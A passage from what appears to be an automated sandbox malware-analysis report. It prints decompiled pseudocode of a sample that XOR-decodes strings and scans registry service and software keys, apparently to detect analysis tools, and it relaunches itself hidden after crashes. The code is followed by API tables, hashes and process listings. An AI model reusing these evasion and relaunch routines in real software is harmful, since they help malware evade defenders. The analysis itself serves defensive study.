				_v28 = _t60;
				_t61 =  *0x402130; // 0x91615
				asm("movsd");
				_v24 = _t61;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				asm("movsb");
				E00401EF0(_t108,  &_v248, 0, 0x40);
				E00401EF0(_t108,  &_v120, 0, 0x40);
				E00401EF0(_t108,  &_v184, 0, 0x40);
				_t117 =  *0x403000 - 0x126; // 0x126
				if(_t117 != 0) {
					L28:
					return _v16;
				} else {
					E00401EA8(_t108,  &_v248,  &_v28, 7);
					_t73 = 0;
					do {
						 *(_t116 + _t73 - 0xf4) =  *(_t116 + _t73 - 0xf4) ^ 0x0000007a;
						_t73 = _t73 + 1;
					} while (_t73 < 7);
					E00401EA8(_t108,  &_v120,  &_v40, 9);
					_t77 = 0;
					do {
						 *(_t116 + _t77 - 0x74) =  *(_t116 + _t77 - 0x74) ^ 0x0000007a;
						_t77 = _t77 + 1;
					} while (_t77 < 9);
					E00401EA8(_t108,  &_v184,  &_v56, 0xc);
					_t81 = 0;
					do {
						 *(_t116 + _t81 - 0xb4) =  *(_t116 + _t81 - 0xb4) ^ 0x0000007a;
						_t81 = _t81 + 1;
					} while (_t81 < 0xc);
					_t124 = "default"; // 0x64
					if(_t124 == 0 || ( *0x403012 & 0x00000004) == 0) {
						goto L28;
					} else {
						if(RegOpenKeyExA(0x80000002, "SYSTEM\\CurrentControlSet\\services", 0, 9,  &_v8) != 0) {
							L19:
							if(RegOpenKeyExA(0x80000002, "SOFTWARE", 0, 9,  &_v8) != 0) {
								goto L28;
							}
							_t112 = 0;
							do {
								E00401EF0(_t108,  &_v508, 0, 0x104);
								_v12 = 0x104;
								_t90 = RegEnumKeyExA(_v8, _t112,  &_v508,  &_v12, 0, 0, 0, 0);
								if(_t90 != 0) {
									if(_t90 == 6 || _t90 == 0x103) {
										break;
									} else {
										goto L26;
									}
								}
								if(lstrcmpiA( &_v508,  &_v184) == 0) {
									_v16 = 1;
								}
								L26:
								_t112 = _t112 + 1;
							} while (_t112 < 0x190);
							RegCloseKey(_v8);
							goto L28;
						}
						_v20 = 0;
						do {
							E00401EF0(_t108,  &_v508, 0, 0x104);
							_v12 = 0x104;
							_t99 = RegEnumKeyExA(_v8, _v20,  &_v508,  &_v12, 0, 0, 0, 0);
							if(_t99 != 0) {
								if(_t99 == 6 || _t99 == 0x103) {
									break;
								} else {
									goto L17;
								}
							}
							if(lstrcmpiA( &_v508,  &_v248) == 0 || lstrcmpiA( &_v508,  &_v120) == 0) {
								_v16 = 1;
							}
							L17:
							_v20 = _v20 + 1;
						} while (_v20 < 0x200);
						RegCloseKey(_v8);
						if(_v16 != 0) {
							goto L28;
						}
						goto L19;
					}
				}
			}

0x00401175
0x00401185
0x00401186
0x00401187
0x00401191
0x00401192
0x00401193
0x00401196
0x0040119f
0x004011a0
0x004011ab
0x004011ae
0x004011b1
0x004011b4
0x004011b5
0x004011c1
0x004011d0
0x004011da
0x004011e1
0x0040139f
0x004013a6
0x004011e7
0x004011f4
0x004011f9
0x004011fb
0x004011fb
0x00401203
0x00401204
0x00401213
0x00401218
0x0040121a
0x0040121a
0x0040121f
0x00401220
0x00401232
0x00401237
0x00401239
0x00401239
0x00401241
0x00401242
0x00401247
0x0040124d
0x00000000
0x00401260
0x00401280
0x00401319
0x0040132e
0x00000000
0x00000000
0x00401330
0x00401332
0x0040133b
0x00401353
0x00401356
0x0040135e
0x00401384
0x00000000
0x00000000
0x00000000
0x00000000
0x00401384
0x00401376
0x00401378
0x00401378
0x0040138d
0x0040138d
0x0040138e
0x00401399
0x00000000
0x00401399
0x00401286
0x00401289
0x00401292
0x004012a9
0x004012af
0x004012b7
0x004012f2
0x00000000
0x00000000
0x00000000
0x00000000
0x004012f2
0x004012cf
0x004012e6
0x004012e6
0x004012fb
0x004012fb
0x004012fe
0x0040130a
0x00401313
0x00000000
0x00000000
0x00000000
0x00401313
0x0040124d

APIs

RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\services,00000000,00000009,?,?,?,0000000C,?,?,00000009,?,?,00000007,?,00000000), ref: 00401277
RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,00000000,00000104,?,?,00000000), ref: 004012AF
lstrcmpiA.KERNEL32(?,0000007A,?,?,00000000), ref: 004012C7
lstrcmpiA.KERNEL32(?,0000007A,?,?,00000000), ref: 004012DC
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0040130A
RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE,00000000,00000009,?,?,?,00000000), ref: 0040132A
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000104,?,?,00000000), ref: 00401356
lstrcmpiA.KERNEL32(?,0000007A,?,?,00000000), ref: 0040136E
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00401399

Strings

z, xrefs: 004011FB
z, xrefs: 00401239
SYSTEM\CurrentControlSet\services, xrefs: 0040126D
z, xrefs: 0040121A
default, xrefs: 00401247
SOFTWARE, xrefs: 00401320

Memory Dump Source

Source File: 00000000.00000002.309850072.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.309858530.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: lstrcmpi$CloseEnumOpen
String ID: SOFTWARE$SYSTEM\CurrentControlSet\services$default$z$z$z
API String ID: 3262041671-1558502941
Opcode ID: 5842a7cac862afd3700852a6373113eeaa19b4c859ffb915a0059b325a35e069
Instruction ID: 2a74ebb18be6b2a378388856ecf3359b292580e9ab32acfa8cedb5b430ba987b
Opcode Fuzzy Hash: 5842a7cac862afd3700852a6373113eeaa19b4c859ffb915a0059b325a35e069
Instruction Fuzzy Hash: 00613FB1D00219AAEB11DBD5CD88FEF77BDAB04304F1004BBEA05F61A1E7789E449B58

Uniqueness

Uniqueness Score: -1.00%

Function 00466150, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 168COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00466316
_memset.LIBCMT ref: 00466329
_memset.LIBCMT ref: 0046633C

Strings

., xrefs: 00466288
', xrefs: 0046619A
%, xrefs: 004662DC
,, xrefs: 00466379
-, xrefs: 00466292
R, xrefs: 004663B2
', xrefs: 004661A1
', xrefs: 00466167
+, xrefs: 004662C1
0, xrefs: 00466175
', xrefs: 00466188
., xrefs: 0046627E

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset
String ID: %$'$'$'$'$+$,$-$.$.$0$R
API String ID: 2102423945-751267039
Opcode ID: 330891fc3c4af050f88bdb3bed07545e5e58f69904e33b483a4d1eaf52581d3e
Instruction ID: e4456c1fd47d796c5ecacec8560a8a87435ac053b2d29e047a0fb959b2106a71
Opcode Fuzzy Hash: 330891fc3c4af050f88bdb3bed07545e5e58f69904e33b483a4d1eaf52581d3e
Instruction Fuzzy Hash: 4E9109709042A8CAEB25CF69DC487DDBBB1AF55308F0481D9D54CAB381E7B94AC8CF16

Uniqueness

Uniqueness Score: -1.00%

Function 0040102F, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040102F(intOrPtr* _a4) {
				struct _PROCESS_INFORMATION _v20;
				char _v52;
				struct _STARTUPINFOW _v120;
				intOrPtr* _t11;
				intOrPtr* _t13;
				intOrPtr _t14;
				void* _t30;
				CHAR* _t32;
				long _t34;
				short _t44;

				_t11 = _a4;
				if(_t11 != 0) {
					_t13 =  *_t11;
					if(_t13 != 0) {
						_t14 =  *_t13;
						if(_t14 == 0xc0000096 || _t14 == 0xc000001d || _t14 == 0xc0000005 || _t14 == 0xc00000fd || _t14 == 0xc0000006) {
							_t44 = L"C:\\Users\\hardz\\Desktop\\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe"; // 0x43
							if(_t44 != 0) {
								_t32 = "__restart";
								_v52 = 0;
								if(GetEnvironmentVariableA(_t32,  &_v52, 0x20) == 0) {
									SetEnvironmentVariableA(_t32, "1");
									E00401EF0(_t30,  &_v20, 0, 0x10);
									_t34 = 0x44;
									E00401EF0(_t30,  &_v120, 0, _t34);
									_v120.wShowWindow = 0;
									_v120.cb = _t34;
									if(CreateProcessW(L"C:\\Users\\hardz\\Desktop\\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe", GetCommandLineW(), 0, 0, 0, 8, 0, 0,  &_v120,  &_v20) != 0 && _v20.hProcess != 0) {
										ExitProcess(0);
									}
								}
							}
						}
					}
				}
				return 0;
			}

0x00401032
0x0040103d
0x00401043
0x00401047
0x0040104d
0x00401054
0x00401076
0x0040107d
0x00401086
0x0040108c
0x00401097
0x0040109f
0x004010ac
0x004010b3
0x004010ba
0x004010c1
0x004010d4
0x004010eb
0x004010f3
0x004010f3
0x004010eb
0x004010f9
0x0040107d
0x00401054
0x00401047
0x004010fe

APIs

GetEnvironmentVariableA.KERNEL32(__restart,?,00000020), ref: 0040108F
SetEnvironmentVariableA.KERNEL32(__restart,0040207C), ref: 0040109F
GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000008,00000000,00000000,?,?,?,00000000,00000044,?,00000000,00000010), ref: 004010D7
CreateProcessW.KERNEL32 ref: 004010E3
ExitProcess.KERNEL32 ref: 004010F3

Strings

__restart, xrefs: 00401086, 0040108B, 0040109E
C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe, xrefs: 00401076, 004010DE

Memory Dump Source

Source File: 00000000.00000002.309850072.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.309858530.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: EnvironmentProcessVariable$CommandCreateExitLine
String ID: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe$__restart
API String ID: 1548484548-1782911316
Opcode ID: 4cacaeec565eda1fd53db4bc905194f10365fa5e65bf9c0a4f94f6188b373352
Instruction ID: dc459d78c8c9caa2215788090c063fea28fe801ffa3665dee38e9abc6d238313
Opcode Fuzzy Hash: 4cacaeec565eda1fd53db4bc905194f10365fa5e65bf9c0a4f94f6188b373352
Instruction Fuzzy Hash: 6D218471A00359AADB30DBE88D89FAF76ACAB08344F14453BB245F35E1D6789984C668

Uniqueness

Uniqueness Score: -1.00%

Function 0046F390, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0046F3AE

Part of subcall function 0046F7BA: __mtinitlocknum.LIBCMT ref: 0046F7CE
Part of subcall function 0046F7BA: __amsg_exit.LIBCMT ref: 0046F7DA
Part of subcall function 0046F7BA: RtlEnterCriticalSection.NTDLL(?), ref: 0046F7E2

___sbh_find_block.LIBCMT ref: 0046F3B9
___sbh_free_block.LIBCMT ref: 0046F3C8
HeapFree.KERNEL32(00000000,?,0047BA00,0000000C,0046F79B,00000000,0047BA68,0000000C,0046F7D3,?,?,?,00473567,00000004,0047BBC8,0000000C), ref: 0046F3F8
GetLastError.KERNEL32(?,00473567,00000004,0047BBC8,0000000C,0046F2C0,0046BB89,0046BB89,00000000,00000000,00000000,0046ED5C,00000001,00000214,?,0046BB89), ref: 0046F409

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: e20c7027544516277371d1de6ec06bcb3d08d4f7b0027aeb6ccc6cd0c6d6a0fb
Instruction ID: 9fd8c4edac344c925454c96c9c0bebbb55aa508fd349f7a48117b1361f290e3b
Opcode Fuzzy Hash: e20c7027544516277371d1de6ec06bcb3d08d4f7b0027aeb6ccc6cd0c6d6a0fb
Instruction Fuzzy Hash: 4E0184719053159ADB206B72BC0675F3A64DF01725F20403FF544A6291EB7C95848AAF

Uniqueness

Uniqueness Score: -1.00%

Function 00477509, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00477539
__isleadbyte_l.LIBCMT ref: 0047756D
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,00473B16,?,?,00000002), ref: 0047759E
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00473B16,?,?,00000002), ref: 0047760C

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d0e7fedc8d9b7f5a56e88bf922d43d40437064c2ebc033e90dc097e27d914392
Instruction ID: f05b0d9c4c961af8813656209e046a60851e430123199dc4b2c63d277d80cc6c
Opcode Fuzzy Hash: d0e7fedc8d9b7f5a56e88bf922d43d40437064c2ebc033e90dc097e27d914392
Instruction Fuzzy Hash: 7431C071A08245FFDF20DF64C8809EA3BA5FF01311F98C5AAE4688B691E334D951DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00477A0C, Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00477A26

Part of subcall function 0046BB84: __getptd_noexit.LIBCMT ref: 0046BB84

Part of subcall function 0046BB25: __decode_pointer.LIBCMT ref: 0046BB2E

___ascii_strnicmp.LIBCMT ref: 00477AA6
__tolower_l.LIBCMT ref: 00477AC7
__tolower_l.LIBCMT ref: 00477AD9

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: Locale__tolower_l$UpdateUpdate::____ascii_strnicmp__decode_pointer__getptd_noexit
String ID:
API String ID: 1027406937-0
Opcode ID: a955d99053437f23081a407f2b009ed7a65872b4e2e8097cdb5edd91e39a1a65
Instruction ID: ec83d48232aeec44e899c07d8b132bac6f7e52407e62b2cc67fbed4926e378b2
Opcode Fuzzy Hash: a955d99053437f23081a407f2b009ed7a65872b4e2e8097cdb5edd91e39a1a65
Instruction Fuzzy Hash: 4B21D971904285AFDF21EFA8C8418FF7764EB00324B94425BF42857296E7399F51C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0046C7CD, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0046C7F1

Part of subcall function 0046C61C: __fltout2.LIBCMT ref: 0046C646

__cftog_l.LIBCMT ref: 0046C817
__cftoe_l.LIBCMT ref: 0046C849

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: d888df9160be2340db94dd77bc43d3d44a4d838ec798346f4d7dc4c44e9ec256
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: A201837200014EBBCF226F84CC81CEE3F63BB19355B188416FA9855531E73AC971AB86

Uniqueness

Uniqueness Score: -1.00%

Function 0046FA84, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 0046EDAA: __getptd_noexit.LIBCMT ref: 0046EDAB
Part of subcall function 0046EDAA: __amsg_exit.LIBCMT ref: 0046EDB8

__amsg_exit.LIBCMT ref: 0046FAB0
__lock.LIBCMT ref: 0046FAC0
InterlockedDecrement.KERNEL32(?), ref: 0046FADD
InterlockedIncrement.KERNEL32(0047ECB0), ref: 0046FB08

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: d7ced18e9def099d59f8c21fb0e8a5fd90c5807b8eb744f3ef424b5a9a536f1e
Instruction ID: 170c8ec64ee92ea58dd7aa41ad6e0757a655143834e258ca425392981c92ade4
Opcode Fuzzy Hash: d7ced18e9def099d59f8c21fb0e8a5fd90c5807b8eb744f3ef424b5a9a536f1e
Instruction Fuzzy Hash: AC01AD36D017119BD721EFA6A80675E73A0BB05B14F10416BE858A7780EB2C6985CBDF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 6068 Parent PID: 4812 explorer.exeCOMMON

Executed Functions

Function 049C0F5A, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049C0F6A

Memory Dump Source

Source File: 0000000B.00000002.741350951.00000000049C0000.00000040.00000001.sdmp, Offset: 049C0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction ID: d067d6f7f8c43baaaaf0cc7687b67092a4983909d97787ad746ac17b45ac11b7
Opcode Fuzzy Hash: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction Fuzzy Hash: 33B0927018A28A5BC341A721082AAA36B592BA1210BAD85AED0C00614BCB180675E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 049C1996, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049C19A6

Memory Dump Source

Source File: 0000000B.00000002.741350951.00000000049C0000.00000040.00000001.sdmp, Offset: 049C0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 969c679d467585fe097550c84f6686814801fec1d9dff6020c96baa77cdad659
Instruction ID: 58f70bd73a2ce6cf2775bdcefb85e762420b2c6e3281e72158bad63f7ced2437
Opcode Fuzzy Hash: 969c679d467585fe097550c84f6686814801fec1d9dff6020c96baa77cdad659
Instruction Fuzzy Hash: F4B09B701892C14FC34153214C2AC537B241E6211135D81E5D0844615AC51C0935D7B2

Uniqueness

Uniqueness Score: -1.00%

Function 049C23D2, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049C23E2

Memory Dump Source

Source File: 0000000B.00000002.741350951.00000000049C0000.00000040.00000001.sdmp, Offset: 049C0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5c2495dd1606676965d5f7e69fb74c7849019982eb61c04de6123e43b62dd00
Instruction ID: 81a4b07dd52a03bdcfa8d4d64a27a4e8ca7373604c9f94afeafeee16d052b9e6
Opcode Fuzzy Hash: f5c2495dd1606676965d5f7e69fb74c7849019982eb61c04de6123e43b62dd00
Instruction Fuzzy Hash: 25B092B15893868BC30297210C2D9A26B281FA2250BAD80EBD0814A15BCA280671E3A2

Uniqueness

Uniqueness Score: -1.00%

Function 049C22CC, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049C22DC

Memory Dump Source

Source File: 0000000B.00000002.741350951.00000000049C0000.00000040.00000001.sdmp, Offset: 049C0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e20adb2ce360fa35eac583c2e49339e9ce53bd62bde90f22986f207d1eb9514d
Instruction ID: e0cb1f680502f0dcf8ba7045b59326c29884707aa5063920e02d9a9154bcf289
Opcode Fuzzy Hash: e20adb2ce360fa35eac583c2e49339e9ce53bd62bde90f22986f207d1eb9514d
Instruction Fuzzy Hash: 20B09B712893854BC3025321081D5522B181BA225476D80DED0814515AC6180531D363

Uniqueness

Uniqueness Score: -1.00%

Function 049C1FBA, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049C1FCA

Memory Dump Source

Source File: 0000000B.00000002.741350951.00000000049C0000.00000040.00000001.sdmp, Offset: 049C0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction ID: f460b8a2c2b4f386ac525e72ce140bdeb14cb6dc77e8e94d45d6a8a21869dd15
Opcode Fuzzy Hash: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction Fuzzy Hash: 7EB0927018A2C64BC30197210C29AA77B582BA1212BAD81AED0C00655ACB280571A7B2

Uniqueness

Uniqueness Score: -1.00%

Function 049C29F6, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049C2A06

Memory Dump Source

Source File: 0000000B.00000002.741350951.00000000049C0000.00000040.00000001.sdmp, Offset: 049C0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 028e36f3d3aae680b40afe16a7d92d7898daecc78d38e73c8e167454168b6fee
Instruction ID: c214e361e1a450b27ed17935694eab7c9ceeb45afb733570b93213ec971ddc4a
Opcode Fuzzy Hash: 028e36f3d3aae680b40afe16a7d92d7898daecc78d38e73c8e167454168b6fee
Instruction Fuzzy Hash: 7DB09B7554A2814FC3415311081D5522B141BA511076DC0D9D0440615AC9180575D7A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: gGRiqYglIOLbY.exe PID: 3888 Parent PID: 6068 gGRiqYglIOLbY.exeCOMMON

Executed Functions

Function 01691FBA, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01691FCA

Memory Dump Source

Source File: 00000010.00000002.731589397.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction ID: f460b8a2c2b4f386ac525e72ce140bdeb14cb6dc77e8e94d45d6a8a21869dd15
Opcode Fuzzy Hash: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction Fuzzy Hash: 7EB0927018A2C64BC30197210C29AA77B582BA1212BAD81AED0C00655ACB280571A7B2

Uniqueness

Uniqueness Score: -1.00%

Function 01690F5A, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01690F6A

Memory Dump Source

Source File: 00000010.00000002.731589397.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction ID: d067d6f7f8c43baaaaf0cc7687b67092a4983909d97787ad746ac17b45ac11b7
Opcode Fuzzy Hash: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction Fuzzy Hash: 33B0927018A28A5BC341A721082AAA36B592BA1210BAD85AED0C00614BCB180675E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 016923D2, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016923E2

Memory Dump Source

Source File: 00000010.00000002.731589397.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5c2495dd1606676965d5f7e69fb74c7849019982eb61c04de6123e43b62dd00
Instruction ID: 81a4b07dd52a03bdcfa8d4d64a27a4e8ca7373604c9f94afeafeee16d052b9e6
Opcode Fuzzy Hash: f5c2495dd1606676965d5f7e69fb74c7849019982eb61c04de6123e43b62dd00
Instruction Fuzzy Hash: 25B092B15893868BC30297210C2D9A26B281FA2250BAD80EBD0814A15BCA280671E3A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: gGRiqYglIOLbY.exe PID: 4840 Parent PID: 6068 gGRiqYglIOLbY.exeCOMMON

Executed Functions

Function 018E0F5A, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018E0F6A

Memory Dump Source

Source File: 00000014.00000002.733636242.00000000018E0000.00000040.00000001.sdmp, Offset: 018E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction ID: d067d6f7f8c43baaaaf0cc7687b67092a4983909d97787ad746ac17b45ac11b7
Opcode Fuzzy Hash: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction Fuzzy Hash: 33B0927018A28A5BC341A721082AAA36B592BA1210BAD85AED0C00614BCB180675E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 018E23D2, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018E23E2

Memory Dump Source

Source File: 00000014.00000002.733636242.00000000018E0000.00000040.00000001.sdmp, Offset: 018E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5c2495dd1606676965d5f7e69fb74c7849019982eb61c04de6123e43b62dd00
Instruction ID: 81a4b07dd52a03bdcfa8d4d64a27a4e8ca7373604c9f94afeafeee16d052b9e6
Opcode Fuzzy Hash: f5c2495dd1606676965d5f7e69fb74c7849019982eb61c04de6123e43b62dd00
Instruction Fuzzy Hash: 25B092B15893868BC30297210C2D9A26B281FA2250BAD80EBD0814A15BCA280671E3A2

Uniqueness

Uniqueness Score: -1.00%

Function 018E1FBA, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018E1FCA

Memory Dump Source

Source File: 00000014.00000002.733636242.00000000018E0000.00000040.00000001.sdmp, Offset: 018E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction ID: f460b8a2c2b4f386ac525e72ce140bdeb14cb6dc77e8e94d45d6a8a21869dd15
Opcode Fuzzy Hash: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction Fuzzy Hash: 7EB0927018A2C64BC30197210C29AA77B582BA1212BAD81AED0C00655ACB280571A7B2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: gGRiqYglIOLbY.exe PID: 2524 Parent PID: 6068 gGRiqYglIOLbY.exeCOMMON

Executed Functions

Function 019F0F5A, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019F0F6A

Memory Dump Source

Source File: 00000015.00000002.730805777.00000000019F0000.00000040.00000001.sdmp, Offset: 019F0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction ID: d067d6f7f8c43baaaaf0cc7687b67092a4983909d97787ad746ac17b45ac11b7
Opcode Fuzzy Hash: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction Fuzzy Hash: 33B0927018A28A5BC341A721082AAA36B592BA1210BAD85AED0C00614BCB180675E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 019F23D2, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019F23E2

Memory Dump Source

Source File: 00000015.00000002.730805777.00000000019F0000.00000040.00000001.sdmp, Offset: 019F0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5c2495dd1606676965d5f7e69fb74c7849019982eb61c04de6123e43b62dd00
Instruction ID: 81a4b07dd52a03bdcfa8d4d64a27a4e8ca7373604c9f94afeafeee16d052b9e6
Opcode Fuzzy Hash: f5c2495dd1606676965d5f7e69fb74c7849019982eb61c04de6123e43b62dd00
Instruction Fuzzy Hash: 25B092B15893868BC30297210C2D9A26B281FA2250BAD80EBD0814A15BCA280671E3A2

Uniqueness

Uniqueness Score: -1.00%

Function 019F1FBA, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019F1FCA

Memory Dump Source

Source File: 00000015.00000002.730805777.00000000019F0000.00000040.00000001.sdmp, Offset: 019F0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction ID: f460b8a2c2b4f386ac525e72ce140bdeb14cb6dc77e8e94d45d6a8a21869dd15
